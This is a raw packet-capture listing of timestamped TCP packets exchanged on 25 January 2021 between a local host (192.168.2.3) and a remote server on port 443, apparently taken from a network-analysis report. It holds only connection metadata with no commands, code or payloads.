Jan 25, 2021 10:23:33.648272991 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.648293972 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.648310900 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.648318052 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.648350000 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.648366928 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.648401022 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.648405075 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.648446083 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.648459911 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.648483992 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.648513079 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.648524046 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.648528099 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.648561001 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.648581982 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.648598909 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.648622036 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.648638964 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.648652077 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.648678064 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.648691893 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.648725986 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.648734093 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.648768902 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.648782969 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.648807049 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.648822069 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.648847103 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.648861885 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.648885965 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.648900032 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.648936033 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.648940086 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.648996115 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.648998022 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.649034023 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.649054050 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.649084091 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.649085045 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.649127007 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.649139881 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.649163961 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.649178028 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.649204016 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.649220943 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.649244070 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.649259090 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.649281979 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.649296045 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.649321079 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.649334908 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.649358988 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.649372101 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.649414062 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.649434090 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.649482012 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.649491072 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.649523973 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.649538040 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.649560928 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.649576902 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.649600029 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.649612904 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.649637938 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.649652958 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.649674892 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.649694920 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.649714947 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.649729013 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.649753094 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.649768114 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.649799109 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.649804115 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.649841070 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.649848938 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.649878025 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.649895906 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.649916887 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.649931908 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.649955988 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.649970055 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.649992943 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.650008917 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.650032043 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.650046110 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.650069952 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.650084019 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.650118113 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.650129080 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.650158882 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.650175095 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.650197029 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.650212049 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.650234938 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.650252104 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.650274992 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.650289059 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.650314093 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.650329113 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.650352001 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.650369883 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.650392056 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.650405884 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.650439978 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.650443077 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.650482893 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.650494099 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.650535107 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.808104038 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.808146000 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.808182955 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.808192968 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.808214903 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.808238029 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.808259010 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.808275938 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.808293104 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.808315039 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.808339119 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.808353901 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.808372974 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.808391094 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.808407068 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.808449030 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.808449984 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.808494091 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.808511019 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.808541059 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.808552027 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.808583975 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.808593988 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.808624029 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.808636904 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.808664083 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.808674097 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.808705091 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.808721066 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.808743954 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.808758974 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.808783054 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.808792114 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.808821917 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.808835030 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.808867931 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.808868885 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.808912992 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.808928967 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.808952093 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.808965921 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.808991909 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.809000969 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.809030056 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.809045076 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.809067011 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.809081078 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.809107065 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.809127092 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.809145927 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.809171915 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.809187889 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.809192896 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.809233904 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.809250116 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.809271097 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.809288025 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.809309959 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.809341908 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.809348106 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.809393883 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.809412956 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.809439898 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.809452057 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.809489012 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.809490919 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.809528112 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.809535027 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.809567928 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.809582949 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.809663057 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.809765100 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.809834957 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.844160080 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.876377106 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.003360987 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.034364939 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.034466028 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.035063028 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.192732096 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.193902016 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.194004059 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.194428921 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.197495937 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.355401039 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.618753910 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.618798971 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.618839025 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.618839979 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.618870974 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.618880987 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.618891001 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.618921041 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.618947029 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.618957996 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.618967056 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.618985891 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.619014025 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.619024992 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.619034052 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.619080067 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.620059967 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.620102882 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.620136023 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.620163918 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.776963949 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.777013063 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.777038097 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.777051926 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.777064085 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.777092934 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.777110100 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.777143002 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.777167082 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.777189016 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.777210951 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.777226925 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.777232885 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.777266979 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.777281046 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.777306080 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.777319908 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.777343988 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.777369976 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.777391911 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.777400970 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.777453899 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.777472973 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.777510881 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.777532101 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.777558088 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.777597904 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.777601004 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.777626038 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.777640104 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.777668953 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.777690887 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.777823925 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.777865887 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.777880907 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.777904987 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.777911901 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.777944088 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.777961969 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.777986050 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.935379028 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.935434103 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.935461998 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.935477018 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.935509920 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.935518026 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.935522079 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.935559034 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.935579062 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.935599089 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.935611010 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.935637951 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.935662985 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.935678959 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.935686111 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.935719013 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.935736895 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.935765982 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.935767889 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.935810089 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.935827017 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.935846090 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.935856104 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.935883999 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.935899973 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.935923100 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.935933113 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.935960054 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.935973883 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.936000109 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.936016083 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.936037064 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.936064005 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.936084986 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.936084986 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.936127901 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.936135054 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.936167002 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.936182022 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.936208963 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.936234951 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.936247110 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.936254025 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.936284065 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.936307907 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.936321974 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.936331034 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.936361074 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.936378002 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.936409950 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.936410904 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.936453104 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.936456919 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.936491013 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.936506033 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.936542034 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.936726093 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.936769009 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.936794996 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.936806917 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.936817884 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.936845064 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.936857939 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.936883926 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.936898947 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.936918974 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.936933994 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.936980009 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.937933922 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.937973022 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.937999010 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.938021898 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.938023090 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.938066006 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.938081026 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.938107967 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.938116074 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.938148022 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:34.938163996 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:34.938204050 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.094273090 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.094319105 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.094357014 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.094358921 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.094383001 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.094397068 CET	443	49726	50.87.232.245	192.168.2.3
